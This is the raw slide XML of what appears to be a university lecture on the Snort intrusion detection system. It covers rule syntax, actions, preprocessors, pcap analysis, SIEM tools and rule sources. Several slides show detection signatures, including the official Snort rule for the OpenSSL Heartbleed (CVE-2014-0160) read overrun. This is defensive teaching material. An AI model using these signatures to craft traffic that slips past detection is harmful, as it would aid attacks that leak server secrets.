            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Originally was a very fast network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Currently on v3.1.21    (3.0 is finally here!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Sourcefire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> created to commercialize the product</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Sourcefire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> sold to Cisco in 2013 for $2.7B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1990245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Snort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&lt;Actions&gt;&lt;Protocol&gt;&lt;SRC IP&gt;&lt;SRC Port&gt;&lt;Direction Op&gt;&lt;DEST IP&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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 Port&gt;&lt;Rule Options&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4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228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Snort - Rule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alert - generate an alert using the selected alert method, and then log the packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>drop - block and log the packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - log the packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - ignore the packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>activate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - alert and then turn on another dynamic rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - remain idle until activated by an activate rule , then act as a log rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>reject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - block the packet, log it, and then send a TCP reset if the protocol is TCP or an ICMP port unreachable message if the protocol is UDP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sdrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - block the packet but do not log it. (silent drop)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3205396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Snort -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TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/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1179433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Snort – IP Addresses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any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Comma separated addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>CIDR blocks (192.168.0.0/16)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Variables (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$HOME_NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, 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!$HOME_NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>These are set in your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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snort.conf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433955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Snort – Direction Operated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4800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>(unidirectional)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t> (bidirectional – slower)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1508760" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>				(why?)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3281358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Snort - Rule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General</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (info about the file, doesn’t affect detection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (look at data inside the packet)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Non-Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (look for header or other data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Post-detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (rule-specific triggers after a rule fires.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14361276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Snort - Preprocessors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Allow processing of traffic after decoding, prior to snort evaluating then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Modular for extending snort</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2552984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Snort – Preprocessor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Frag3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Stream5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>sfPortscan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>SMTP, FTP/Telnet, HTTP, IMAP, POP, SIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Back Orifice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1984452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snort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Format: &lt;Actions&gt;&lt;Protocol&gt;&lt;SRC IP&gt;&lt;SRC Port&gt;&lt;Direction Op&gt;&lt;DEST IP&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> Port&gt; &lt;Rule Options&gt;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alert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> any any -&gt; any any (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>: “ICMP Packet”; sid:1;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3301849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Defense in Depth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Intrusion Detection/Prevention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="733367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AD884-B1F7-0543-95A5-85E00574E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Snort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59F20-09C2-534E-A849-4E91297B8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One of the key functions of Snort, being able to search for a pattern (content) inside of a packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Grep for a packet!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Content can be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Straight text – “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umd.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Hexadecimal (denoted with “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400" dirty="0"/>
              <a:t>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400" dirty="0"/>
              <a:t>”) – “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|18 02 03|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Can use the NOT (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sz="2400" dirty="0"/>
              <a:t>) operand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Lots of modifiers to content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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nocase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rawbytes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, depth, offset, distance, within,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http_client_body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http_cookie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http_header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http_uri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1782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375E7-FB8B-314E-9B94-A7483C5F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Snort – OpenSSL Heartbleed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04358-158B-FA48-B8D4-0336B983B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2025"/>
            <a:ext cx="7620000" cy="514877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alert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any 443 -&gt; any any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:”OpenSSL Heartbleed response"; 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content:"|18 03 02|"; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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depth:3;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dsize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:&gt;40;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reference:cve,2014-0160;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sid:3;)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b="1" dirty="0"/>
              <a:t> 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any 443 -&gt; any any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= Any IP address on port 443 sending traffic out</a:t>
            </a:r>
          </a:p>
          <a:p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content:”|18 03 02|” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= The packet has the hexadecimal values of “18 03 02” in the packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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depth:3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = Only look at the first 3 bytes for the content </a:t>
            </a:r>
          </a:p>
          <a:p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dsize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:&gt;40 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= Only look at packets that are larger than 40 bytes in size</a:t>
            </a:r>
          </a:p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reference:cve,2014-0160 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= a CVE reference for the Heartbleed vulnerability.  Useful metadata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78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D143-5B4D-1A47-A5C1-4CC966780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Snort – OpenSSL Heartbleed rule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01FC91-1F8A-CB4B-8CA3-81D48D8ED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7241"/>
            <a:ext cx="7620000" cy="2195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F5C9B-5C72-994F-9A0A-11D1873694E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4423034"/>
            <a:ext cx="4287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content:"|18 03 02|"; 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depth:3; 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85FACE-4583-6141-978F-8679B9C7C68F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="249366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dsize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:&gt;40; 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5F9990-363E-6546-89E4-9B09A54C9B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1445741" y="3862406"/>
            <a:ext cx="0" cy="48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BCD63D-AEB9-614E-9416-D95878F770DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2601097" y="2764823"/>
            <a:ext cx="2428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6301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6997"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Snort – Official Heartbleed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alert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$EXTERNAL_NET any -&gt; $HOME_NET 443 (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:"SERVER-OTHER OpenSSL SSLv3 heartbeat read overrun attempt";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flow:to_server,established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 content:"|18 03 02|"; depth:3;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dsize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:&gt;40;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detection_filter:track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by_src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, count 3, seconds 1;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metadata:policy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balanced-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ips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drop, policy security-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ips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drop, service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ssl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 reference:cve,2014-0160;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classtype:attempted-recon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 sid:30512; rev:2;)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VS.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alert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any 443 -&gt; any any (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:”OpenSSL Heartbleed response"; content:"|18 03 02|"; depth:3;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dsize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:&gt;40; reference:cve,2014-0160;  sid:3;)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12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Rule Grouping and Rule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Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Without content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>With content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16723898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Rule Grouping and Rule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Rules without content will always be evaluated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Rules with content options grouped by snort multi-pattern matcher to reduce evaluations and thus improve performance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850638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Golden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 algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Write to the vulnerability, not the exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1336724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Snort – Real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snort –c /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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/snort/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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snort.conf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 –A fast –l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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/log/snort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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-c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>config file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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-A fast </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>= fast alerting = give me syslog output in “alerts” files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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-l log directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Defaults to main network adapter, specify with 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US" sz="3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US" sz="3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39505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Snort – .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pcap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snort –r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0"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3200" dirty="0"/>
              <a:t>= read and process a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> (packet capture) for analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p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snort –c /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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/snort/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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snort.conf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 –A fast –l /var/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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logl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/snort –r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0"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39477977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13A3-D1CC-F54B-934B-604516F44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Snort – .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –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D5423-CD70-3A48-9E6C-F2B192AA9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dirty="0"/>
              <a:t>For developing and testing new rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>You are able to capture network traffic somewhere but are unable to run Snort there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>In larger environments it often makes more sense to capture traffic in 5+ minute “chunks” and then process those “chunks” vs running in real time.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4200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Intrusion Detection &amp; Prevention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Intrusion Detection = Passive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>“Oops, you got owned.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Intrusion Prevention – IPS*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>“Hey look I stopped you from getting owned!”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96396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38F3-92C1-0745-A2B9-BAEA5C3BB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Snort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6A8C0-AE43-B149-9016-AA08E2A78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 ”ENPM685-Week4-IDS.pdf”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>In this exercise you will:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Configure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Write some snort rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Test snort against those rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Take 30 minutes for this exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42925286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with snort alerts?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ACID/BASE (old school)  	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://base.professionallyevil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Put into a SIEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>OSSIM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>AlienVault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Squil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Snorby</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Squert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239999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BASE – Basic Analysis &amp; Security Engine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snort-base-fig1-145116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15" r="-4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4366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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="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41" r="-198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248321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OSSIM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Hands-on 7-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25" b="-3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90372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Squil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sguil_mai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25" r="-33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11664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Snorby</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snorby-dashboar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45" r="-26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639334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Squert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screenshot from 2015-04-21 10-55-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88" b="-47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68836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PulledPork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https://github.com/shirkdog/pulledpork</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Snort rule management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automates downloading and pushing out new rules, along with modifying them to fit your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940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rules?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Snort/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sourcefire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Cisco – Need to register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free rules (30 day delay, used to be 7 days)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paid rules ($30 - $400/sensor)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Emerging Threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Source - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>rules.emergingthreats.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
